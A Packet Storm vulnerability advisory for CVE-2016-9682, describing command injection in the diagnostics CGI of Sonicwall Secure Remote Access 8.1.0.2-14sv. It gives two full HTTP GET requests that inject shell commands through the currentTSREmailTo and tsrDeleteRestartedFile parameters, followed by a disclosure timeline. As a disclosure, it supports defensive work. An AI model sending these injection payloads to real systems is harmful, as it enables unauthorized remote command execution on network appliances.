Sonicwall Secure Remote Access (SRA) 8.1.0.2-14sv Command Injection

2017-07-19T00:00:00
ID PACKETSTORM:143418
Type packetstorm
Reporter Russell Sanford
Modified 2017-07-19T00:00:00

Description

                                        
                                            `Sonicwall Secure Remote Access (SRA) - Command Injection Vulnerabilities  
  
Vendor: Sonicwall (Dell)  
Product: Secure Remote Access (SRA)  
Version: 8.1.0.2-14sv  
Platform: Embedded Linux  
Discovery: Russell Sanford of Critical Start (www.CriticalStart.com)  
CVE: cve-2016-9682  
  
  
Tested against version 8.1.0.2-14sv on 11/28/16 (fully updated)  
  
  
Description:  
The Sonicwall Secure Remote Access server (ver 8.1.0.2-14sv) is vulnerable to two Remote Command Injection vulnerabilities in it's  
web administrative interface. These vulnerabilies occur in the diagnostics CGI (/cgi-bin/diagnostics) component responsible for  
emailing out information about the state of the system. The application doesn't properly escape the information passed in the 'tsrDeleteRestartedFile'  
or 'currentTSREmailTo' variables before making a call to system() allowing for remote command injection.  
  
Exploitation of this vulnerability yeilds shell access to the remote machine under the useraccount 'nobody'  
  
  
Impact:   
Remote Code Execution  
  
  
Exploit #1 -----------------------------------------------------------------  
  
GET /cgi-bin/diagnostics?tsrEmailCurrent=true&currentTSREmailTo=|date>/tmp/xort||a%20%23 HTTP/1.1  
Host: 192.168.84.155  
Accept: */*  
Accept-Language: en  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)  
Connection: close  
Referer: https://192.168.84.155/cgi-bin/diagnostics  
Cookie: SessURL=https%3A%2F%2F192.168.84.155%2Fcgi-bin%2Fwelcome; svDomainName=LocalDomain; activeUserSessionsTable=0; ajaxUpdates=ON; activeNxSessionsTable=0; servicesBookmarksTable=1; policyListTable=1; portalListTable=1; domainListTable=0; period=1; activeTab=4; curUrl=license; swap=dEVySFNhTXl5V3NLSXNWUFUzVzBNNTJJQ1o2WXpCODNrOGZYUGxYazJOZz0=  
  
  
Exploit #2 -----------------------------------------------------------------  
  
GET /cgi-bin/diagnostics?tsrDeleteRestarted=true&tsrDeleteRestartedFile=|date>/tmp/xort2||a%20%23 HTTP/1.1  
Host: 192.168.84.155  
Accept: */*  
Accept-Language: en  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)  
Connection: close  
Referer: https://192.168.84.155/cgi-bin/diagnostics  
Cookie: SessURL=https%3A%2F%2F192.168.84.155%2Fcgi-bin%2Fwelcome; svDomainName=LocalDomain; activeUserSessionsTable=0; ajaxUpdates=ON; activeNxSessionsTable=0; servicesBookmarksTable=1; policyListTable=1; portalListTable=1; domainListTable=0; period=1; activeTab=4; curUrl=sslcert; swap=dDdWMjhSYzlzMEZBd3kwQ29rTzZxQWFKdmxUSU5SRFVBQTRGRWk5UzJXVT0=  
  
  
Timeline:  
11/14/16 - Discovered in audit  
11/20/16 - POC msf exploit written  
11/28/16 - Contacted mitre for CVE  
11/30/16 - CVE received from mitre (CVE-2016-9682)  
11/30/16 - Dell notified through Sonicwall vuln reporting  
  
  
  
  
`